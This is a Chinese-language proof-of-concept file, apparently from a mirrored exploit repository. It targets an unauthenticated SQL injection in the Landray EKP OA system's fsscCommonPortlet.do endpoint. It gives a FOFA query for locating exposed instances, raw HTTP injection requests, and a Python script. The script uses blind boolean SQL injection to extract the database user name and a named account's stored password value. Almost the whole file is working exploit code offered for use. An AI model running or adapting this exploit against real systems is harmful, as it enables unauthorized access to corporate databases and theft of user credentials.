admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

166 lines
4.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞
蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
## fofa
```javascript
app="Landray-OA系统"
```
## poc
访问save方法填充一下数据库
```javascript
POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
method=saveICare&fdId=&fdNum=1&docSubject=1&fdName=1&createTime=1&fdStatus=1
```
```javascript
POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
method=getICareByFdId&fdNum=asdasd'+or+'1'='1&ordertype=down
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240962.png)
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240942.png)
## Python脚本
```python
import argparse
import requests
header = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
}
def exploit_user(url,db_user):
global header
user_name = ""
for i in range(1, 20):
low = 1
top = 255
mid = (low + top) // 2
while low < top:
send_data = {
"method": "getICareByFdId",
"ordertype": "down",
"fdNum": "aNsSl' or ascii(substring((user_name()),{},1)) < {} and '1'='1".format(
i, mid)
}
res = requests.post(url, data=send_data, headers=header)
if "docSubject" in res.text:
top = mid
else:
low = mid + 1
mid = (top + low) // 2
if mid <= 1 or mid >= 254:
break
user_name = user_name + chr(mid - 1)
print("[+]user_name:{}".format(user_name))
print("\033[F", end="")
print("[+]user_name:{}".format(user_name))
def exploit(url,username):
global header
password_len = 32
password = ""
for i in range(1,password_len+1):
low = 1
top = 255
mid = (low + top) // 2
while low < top:
send_data = {
"method": "getICareByFdId",
"ordertype": "down",
"fdNum": "aNsSl' or ascii(substring((select fdPassword from com.landray.kmss.sys.organization.model.SysOrgPerson where fdLoginName='{}'),{},1)) < {} and '1'='1".format(
username,i, mid)
}
res = requests.post(url,data=send_data,headers=header)
if "docSubject" in res.text:
top = mid
else:
low = mid + 1
mid = (top + low) // 2
password = password + chr(mid-1)
print("[+]password:{}".format(password))
print("\033[F",end="")
print("[+]password:{}".format(password))
def scan_vuln(url,username,db_user):
global header
req_url = url.strip("/") + "/fssc/common/fssc_common_portlet/fsscCommonPortlet.do"
step_data = {
"method":"saveICare",
"fdId:"","
"fdNum":"1",
"docSubject":"1",
"fdName":"test",
"createTime":"1",
"fdStatus":"1"
}
try:
req1 = requests.post(req_url,data=step_data,headers=header)
if req1.status_code == 200 and "result" in req1.text:
print("[+]Vuln existstart inject password:")
if db_user == "check":
exploit_user(req_url,db_user)
else:
exploit(req_url,username)
else:
print("[-]Vuln not exist.")
exit(0)
except:
print("[-]request error.")
exit(0)
pass
def main():
parser = argparse.ArgumentParser(description="Process command line arguments")
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-db_user', '--db_user', required=False, help='db_user')
parser.add_argument('-U', '--username', required=False, help='Username argument')
args = parser.parse_args()
url = args.url
db_user = args.db_user
username = args.username
scan_vuln(url, username, db_user)
if __name__ == '__main__':
main()
```
## 漏洞来源
- https://xz.aliyun.com/t/16103?time__1311=GuD%3D7KiK0KYIx05DK7qCuxWuEoT6PGC4E8eD
Reference in New Issue View Git Blame Copy Permalink